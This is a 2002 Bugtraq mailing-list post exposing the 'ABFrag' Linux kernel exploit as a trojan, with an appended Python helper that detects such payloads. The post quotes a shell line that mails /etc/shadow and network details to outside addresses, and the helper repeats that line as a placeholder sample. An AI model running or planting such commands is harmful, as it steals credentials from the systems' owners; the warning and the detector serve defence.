Bugtraq mailing list archives

Re: Linux Kernel Exploits / ABFrag


From: Muhammad Faisal Rauf Danka <mfrd () attitudex com>
Date: Fri, 18 Oct 2002 23:04:33 -0700 (PDT)

Read that related news: 
<quote> 
A message posted on the Security Mailing list BugTraq about an exploit for Linux kernels, "ABFrags", has turned out to be 
a fake. Rumors about "abfrags.c", which would use a security hole in the TCP/IP stack, have been spreading for weeks on 
the chat network EFnet, although at that time it was supposed to be an exploit for FreeBSD kernels. 
</quote> 

link: http://www.heise.de/english/newsticker/data/jk-18.10.02-006/ 

Previously there was a binary out by the name "syncthis", which looked somewhat the same, but actually used to run 
this behind it: 

#!/bin/sh 
(/sbin/ifconfig;cat /etc/shadow; cat) | /bin/mail -s $HOSTNAME b4shb0y () hotmail com -c B1tch () hushmail com 
/dev/null 2>/dev/null 

It claimed to be a Linux tcp stack exploit. 

McKenzy Wihle GSH security - 9/01/02: 
Remote kernel tcp packet sync bug. Check GSH main dir for whitepaper. 
This bug does not leave GSH labs until further notice. 

update: 
9/03/02 - got response from George Weenste, NSA coordinated fix release 
and vulnerability disclosure to come in December 2002 linux kernel developers warned 

--- WARNING: Will not fail on most errors, read whitepaper for proper use. --- 

READ WHITEPAPER! - no args 


Its password was "nsasucks" 

Has anyone tried that on the abfrag binary? 

ABfrag posers are pasting this in IRC sessions to initiate trades, and eventually get access to your host. 

server@thebox:~$ ./ABfrag.bin -d 192.168.1.20 

---------------------------------------------------------------------------- 
ABfrag - Linux Kernel ( <= 2.4.20pre20 ) Remote Syncing Exploit 
Found and coded by Ac1db1tch3z - t3kn10n, n0n3 and t3kn0h03. 
WARNING: 
Unlicensed usage and/or distribution of this program carries heavy fines and penalties under American, British, 
European and International copyright law. 
Should you find this program on any compromised system we 
urge you to delete this binary rather than attempt distribution or analysis. 
Such actions would be both unlawful and unwise. 

---------------------------------------------------------------------------- 
password: 
* Finding local offsets (for sync with remote kernel). 
* Finding remote time intervals...567ms per packet 
* repairing LKM source into shellcode 
* Obtained socket for connect back 
-- Sending Racer PACKET complete! -- 
.............................................CONNECT BACK 
FAILED! 
FIXING! 
Fixed timing at 0x8453fffe 
bash# id 
uid=0(root) gid=0(root) groups=11(httpd) 
bash# w 
6:01pm up 12 days, 17:06, 0 users, load average: 0.34, .26, 0.20 


I think the person who cracked Mr Daniel might have uploaded this trojan later on, to use his box as a launch 
pad to attack more hosts, or just to try out this exploit for the heck of it. 

Does Mr Daniel have any snort dumps from while the attack occurred?


Regards
--------
Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202

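The "syncthis" payload above is a shell pipeline that feeds /etc/shadow into /bin/mail. The following is an added triage helper, not code from the post or from any of the parties named in it: it tokenises a shell script and flags any pipeline in which a sensitive file is read and an outbound sink (mail, nc, curl, ...) appears, so that a fake "exploit" of this kind can be recognised before it is run. The sample script and its recipient addresses are constructed placeholders.

```python
import os
import shlex

# Files whose contents leaving the host mean credentials were stolen.
SENSITIVE_FILES = {"/etc/shadow", "/etc/passwd", "/etc/master.passwd"}
# Commands that move data off the box (outbound sinks).
EXFIL_SINKS = {"mail", "mailx", "sendmail", "nc", "netcat", "curl", "wget"}
SEPARATORS = {";", "&&", "||", "&"}


def analyse_script(script: str) -> list:
    """Flag pipelines that feed a sensitive file into an outbound sink.
    Each finding names the script line, the files read and the sinks used."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank lines, comments and the shebang carry no commands
        lex = shlex.shlex(line, posix=True, punctuation_chars=True)
        lex.whitespace_split = True  # keep '$HOSTNAME' and 'a@b.c' as one token
        pipelines, depth = [[[]]], 0  # pipelines -> stages -> argv tokens
        for tok in lex:
            if tok == "(":
                depth += 1  # a subshell's combined output flows into the pipe
            elif tok == ")":
                depth -= 1
            elif tok == "|" or (tok in SEPARATORS and depth > 0):
                pipelines[-1].append([])  # new stage, same data flow
            elif tok in SEPARATORS:
                pipelines.append([[]])  # an independent pipeline starts
            elif set(tok) <= set("<>&"):
                continue  # redirection operators; their targets stay as args
            else:
                pipelines[-1][-1].append(tok)
        for stages in pipelines:
            reads, sinks = set(), set()
            for stage in stages:
                if not stage:
                    continue
                cmd = os.path.basename(stage[0])
                if cmd in EXFIL_SINKS:
                    sinks.add(cmd)
                reads.update(t for t in stage if t in SENSITIVE_FILES)
            if reads and sinks:
                findings.append({"line": lineno, "files": sorted(reads),
                                 "sinks": sorted(sinks)})
    return findings


# Constructed sample mirroring the shape of the "syncthis" payload; the
# recipient addresses are placeholders, not those quoted in the message.
TROJAN = """#!/bin/sh
(/sbin/ifconfig; cat /etc/shadow; cat) | /bin/mail -s $HOSTNAME attacker@example.com -c other@example.net >/dev/null 2>/dev/null
"""

if __name__ == "__main__":
    print(analyse_script(TROJAN))
```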

